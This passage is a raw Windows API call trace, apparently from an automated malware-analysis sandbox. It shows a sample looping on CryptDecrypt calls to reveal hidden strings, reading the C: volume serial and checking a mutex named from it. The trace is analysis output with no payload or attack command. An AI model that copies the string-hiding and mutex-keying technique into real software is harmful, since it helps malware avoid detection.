HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0046.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0046.894] Sleep (dwMilliseconds=0x3e8) [0048.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0048.095] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0048.096] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0048.096] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0048.096] CryptDestroyKey (hKey=0xe927f0) returned 1 [0048.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0048.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0048.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8658 [0048.096] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0048.096] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0048.096] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8658, pdwDataLen=0x2abf984 | out: pbData=0x2af8658, pdwDataLen=0x2abf984) returned 1 [0048.096] CryptDestroyKey (hKey=0xe927f0) returned 1 [0048.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8658 | out: hHeap=0x2af0000) returned 1 [0048.096] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0048.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0048.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0048.096] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0048.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0048.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0048.098] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0048.098] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0048.098] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0048.098] CryptDestroyKey (hKey=0xe927f0) returned 1 [0048.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0048.098] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0048.098] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0048.098] CloseHandle (hObject=0x2c0) returned 1 [0048.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0048.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0048.099] Sleep (dwMilliseconds=0x3e8) [0049.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0049.496] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0049.496] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0049.496] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0049.496] CryptDestroyKey (hKey=0xe927f0) returned 1 [0049.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0049.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0049.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af89e8 [0049.496] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0049.496] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0049.497] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af89e8, pdwDataLen=0x2abf984 | out: pbData=0x2af89e8, pdwDataLen=0x2abf984) returned 1 [0049.497] CryptDestroyKey (hKey=0xe927f0) returned 1 [0049.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af89e8 | out: hHeap=0x2af0000) returned 1 [0049.497] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0049.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0049.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0049.497] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0049.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0049.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0049.497] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0049.497] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0049.497] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0049.497] CryptDestroyKey (hKey=0xe927f0) returned 1 [0049.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0049.497] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0049.497] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0049.497] CloseHandle (hObject=0x2c0) returned 1 [0049.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0049.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0049.497] Sleep (dwMilliseconds=0x3e8) [0051.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0051.111] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0051.111] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0051.111] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0051.111] CryptDestroyKey (hKey=0xe92870) returned 1 [0051.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0051.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0051.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af86f0 [0051.111] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0051.111] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0051.111] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af86f0, pdwDataLen=0x2abf984 | out: pbData=0x2af86f0, pdwDataLen=0x2abf984) returned 1 [0051.111] CryptDestroyKey (hKey=0xe92870) returned 1 [0051.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af86f0 | out: hHeap=0x2af0000) returned 1 [0051.111] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0051.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0051.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0051.112] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0051.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0051.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0051.112] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0051.112] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0051.112] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0051.112] CryptDestroyKey (hKey=0xe92870) returned 1 [0051.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0051.112] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2bc [0051.112] WaitForSingleObject (hHandle=0x2bc, dwMilliseconds=0x0) returned 0x102 [0051.112] CloseHandle (hObject=0x2bc) returned 1 [0051.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0051.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0051.112] Sleep (dwMilliseconds=0x3e8) [0052.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0052.938] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0052.938] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0052.938] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0052.938] CryptDestroyKey (hKey=0xe92870) returned 1 [0052.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0052.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0052.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8360 [0052.938] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0052.938] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0052.938] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8360, pdwDataLen=0x2abf984 | out: pbData=0x2af8360, pdwDataLen=0x2abf984) returned 1 [0052.938] CryptDestroyKey (hKey=0xe92870) returned 1 [0052.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8360 | out: hHeap=0x2af0000) returned 1 [0052.939] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0052.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0052.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0052.939] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0052.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0052.939] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0052.939] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0052.939] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0052.939] CryptDestroyKey (hKey=0xe92870) returned 1 [0052.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0052.939] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0052.939] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0052.939] CloseHandle (hObject=0x2c4) returned 1 [0052.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0052.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0052.940] Sleep (dwMilliseconds=0x3e8) [0054.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0054.568] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0054.569] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0054.573] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0054.573] CryptDestroyKey (hKey=0xe92870) returned 1 [0054.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0054.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0054.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8528 [0054.574] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0054.574] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0054.574] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8528, pdwDataLen=0x2abf984 | out: pbData=0x2af8528, pdwDataLen=0x2abf984) returned 1 [0054.574] CryptDestroyKey (hKey=0xe92870) returned 1 [0054.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8528 | out: hHeap=0x2af0000) returned 1 [0054.574] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0054.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0054.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0054.574] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0054.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0054.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0054.574] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0054.574] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0054.574] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0054.574] CryptDestroyKey (hKey=0xe92870) returned 1 [0054.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0054.574] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0054.574] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0054.574] CloseHandle (hObject=0x2c4) returned 1 [0054.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0054.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0054.574] Sleep (dwMilliseconds=0x3e8) [0056.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0056.053] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0056.053] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0056.053] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0056.053] CryptDestroyKey (hKey=0xe92870) returned 1 [0056.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0056.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0056.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8b18 [0056.053] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0056.053] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0056.053] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8b18, pdwDataLen=0x2abf984 | out: pbData=0x2af8b18, pdwDataLen=0x2abf984) returned 1 [0056.053] CryptDestroyKey (hKey=0xe92870) returned 1 [0056.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8b18 | out: hHeap=0x2af0000) returned 1 [0056.053] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0056.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0056.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0056.053] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0056.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0056.054] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0056.054] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0056.054] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0056.054] CryptDestroyKey (hKey=0xe92870) returned 1 [0056.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0056.054] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0056.054] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0056.054] CloseHandle (hObject=0x2c4) returned 1 [0056.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0056.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0056.054] Sleep (dwMilliseconds=0x3e8) [0057.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0057.282] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0057.282] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0057.282] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0057.282] CryptDestroyKey (hKey=0xe92870) returned 1 [0057.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0057.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0057.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8a80 [0057.282] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0057.282] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0057.282] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8a80, pdwDataLen=0x2abf984 | out: pbData=0x2af8a80, pdwDataLen=0x2abf984) returned 1 [0057.282] CryptDestroyKey (hKey=0xe92870) returned 1 [0057.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8a80 | out: hHeap=0x2af0000) returned 1 [0057.282] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0057.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0057.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0057.282] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0057.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0057.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0057.282] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, 